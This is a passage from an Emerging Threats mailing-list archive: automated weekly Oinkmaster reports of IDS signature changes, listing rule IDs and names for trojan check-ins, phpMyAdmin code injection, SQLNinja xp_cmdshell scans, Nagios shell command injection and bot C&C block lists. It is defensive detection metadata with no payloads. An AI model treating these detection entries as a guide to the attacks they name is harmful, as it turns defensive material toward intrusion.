url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (48): 2500170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sat Aug 8 18:00:12 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 8 Aug 2009 18:00:12 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes Message-ID: <20090808220012.5D62E4504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Aug 8 18:00:12 2009 [***] [+++] Added rules: [+++] 2009704 - ET TROJAN Generic Downloader Check-in (emerging-virus.rules) 2009705 - ET MALWARE W3i Related Adware/Spyware (emerging-malware.rules) 2009706 - ET POLICY Nessus Vulnerability Scanner Plugins Update (emerging-policy.rules) 2009709 - ET WEB phpMyAdmin Setup Code Injection (phpinfo) (emerging-web.rules) 2009710 - ET WEB phpMyAdmin Setup Code Injection (system) (emerging-web.rules) 2009711 - ET TROJAN Win32.Runner (Often Rootkit) - POST (emerging-virus.rules) 2009712 - ET MALWARE Adware PlusDream - GET Config Download/Update (emerging-malware.rules) 2009713 - ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected (emerging.rules) [///] Modified active rules: [///] 2002997 - ET WEB PHP Remote File Inclusion (monster list http) (emerging-web.rules) 2003520 - ET WEB EXPLOIT webCalendar Remote File include (emerging-web.rules) 2009041 - ET SCAN SQLNinja MSSQL Database User Rights Scan (emerging-scan.rules) 2009042 - ET SCAN SQLNinja MSSQL Authentication Mode Scan (emerging-scan.rules) 2009043 - ET SCAN SQLNinja Attempt To Recreate xp_cmdshell Using sp_configure (emerging-scan.rules) 2009044 - ET SCAN SQLNinja Attempt To Create xp_cmdshell Session (emerging-scan.rules) 2009126 - ET TROJAN Win32/Monkif Downloader Checkin (emerging-virus.rules) 2009531 - ET TROJAN Garmania Trojan Check-in (emerging-virus.rules) 2009532 - ET TROJAN Unknown Trojan Check-in (3) (emerging-virus.rules) 2009670 - ET WEB Nagios statuswml.cgi Remote Arbitrary Shell Command Injection attempt (emerging-web.rules) 2009694 - ET TROJAN Navipromo related update (emerging-virus.rules) 2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules) 2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules) 2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules) 2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules) 2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules) 2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules) 2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules) 2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules) 2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules) 2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules) 2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules) 2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules) 2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules) 2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules) 2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules) 2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules) 2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules) 2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules) 2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules) 2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules) 2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules) 2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules) 2404020 - ET DROP Known Bot C&C Server Traffic (group 21) (emerging-botcc.rules) 2404021 - ET DROP Known Bot C&C Server Traffic (group 22) (emerging-botcc.rules) 2404022 - ET DROP Known Bot C&C Server Traffic (group 23) (emerging-botcc.rules) 2404023 - ET DROP Known Bot C&C Server Traffic (group 24) (emerging-botcc.rules) 2404024 - ET DROP Known Bot C&C Server Traffic (group 25) (emerging-botcc.rules) 2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405021 - ET DROP Known Bot C&C Traffic (group 22) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405022 - ET DROP Known Bot C&C Traffic (group 23) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405023 - ET DROP Known Bot C&C Traffic (group 24) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405024 - ET DROP Known Bot C&C Traffic (group 25) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) [---] Disabled and modified rules: [---] 2009702 - ET CURRENT_EVENTS POLICY DNS Update From External net (emerging.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-malware.rules (2): # ref: f6a78be315d98ba8df4e72296ac8ec0c # ref: a9036ae5d9bb8e3c53d5e0126d448d1d -> Added to emerging-sid-msg.map (9): 2009126 || ET TROJAN Win32/Monkif Downloader Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Monkif || url,doc.emergingthreats.net/2009126 || url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=TrojanDownloader%3aWin32%2fMonkif.C 2009704 || ET TROJAN Generic Downloader Check-in || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009704 2009705 || ET MALWARE W3i Related Adware/Spyware || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_Freeze.com || url,doc.emergingthreats.net/2009705 || url,www.tallemu.com/oasis2/vendor/w3i__llc/623302 2009706 || ET POLICY Nessus Vulnerability Scanner Plugins Update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Nessus || url,doc.emergingthreats.net/2009706 || url,www.nessus.org/plugins/ || url,www.nessus.org/nessus/ 2009709 || ET WEB phpMyAdmin Setup Code Injection (phpinfo) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHPMyadmin || url,doc.emergingthreats.net/2009709 2009710 || ET WEB phpMyAdmin Setup Code Injection (system) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHPMyadmin || url,doc.emergingthreats.net/2009710 2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.threatexpert.com/threats/trojan-win32-runner.html || url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html 2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update 2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2 -> Added to emerging-sid-msg.map.txt (9): 2009126 || ET TROJAN Win32/Monkif Downloader Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Monkif || url,doc.emergingthreats.net/2009126 || url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=TrojanDownloader%3aWin32%2fMonkif.C 2009704 || ET TROJAN Generic Downloader Check-in || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009704 2009705 || ET MALWARE W3i Related Adware/Spyware || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_Freeze.com || url,doc.emergingthreats.net/2009705 || url,www.tallemu.com/oasis2/vendor/w3i__llc/623302 2009706 || ET POLICY Nessus Vulnerability Scanner Plugins Update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Nessus || url,doc.emergingthreats.net/2009706 || url,www.nessus.org/plugins/ || url,www.nessus.org/nessus/ 2009709 || ET WEB phpMyAdmin Setup Code Injection (phpinfo) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHPMyadmin || url,doc.emergingthreats.net/2009709 2009710 || ET WEB phpMyAdmin Setup Code Injection (system) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHPMyadmin || url,doc.emergingthreats.net/2009710 2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.threatexpert.com/threats/trojan-win32-runner.html || url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html 2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update 2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2 -> Added to emerging-virus.rules (2): # ref: 0f79f76f0ea1d53690ed916142f94083 # ref: 14d98e50d25dfc3c1bc011c2856ac1a8 -> Added to emerging-web.rules (1): #by dxp [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (129): 2009126 || ET TROJAN Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126 2500170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (90) || 